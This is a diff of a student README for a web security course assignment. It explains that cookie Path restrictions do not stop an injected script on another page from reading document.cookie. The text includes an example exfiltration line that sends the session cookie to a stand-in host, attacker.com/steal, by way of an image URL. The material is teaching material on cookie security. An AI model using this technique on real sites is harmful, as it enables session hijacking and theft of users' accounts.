phonedude/cs533-f23/assignments/Thennakoon/4/README.md

 <kbd><img src="screenshots/insecure_html.PNG" width="700" ></kbd>

- * Example futher explained.
+ **Example futher explained**

 - The server tries to restrict access to pages under the "/user" path by setting the sessionId cookie with a Path attribute of "/user".
 - Then the attacker injects a script into a different page (insecure.html) that runs in the user's browser.
 This script accesses the document.cookie property, which includes all accessible cookies, regardless of the Path attribute.
 - The image object created byy the inected script appends the user's cookie to the image URL.
-This URL points to a server controlled by the attacker **(https://attacker.com/steal?cookie= + document.cookie)* .
+This URL points to a server controlled by the attacker *(https://attacker.com/steal?cookie= + document.cookie)* .
 - When the user visits the insecure.html page, the injected script runs, sending the user's session cookie to the attacker's server.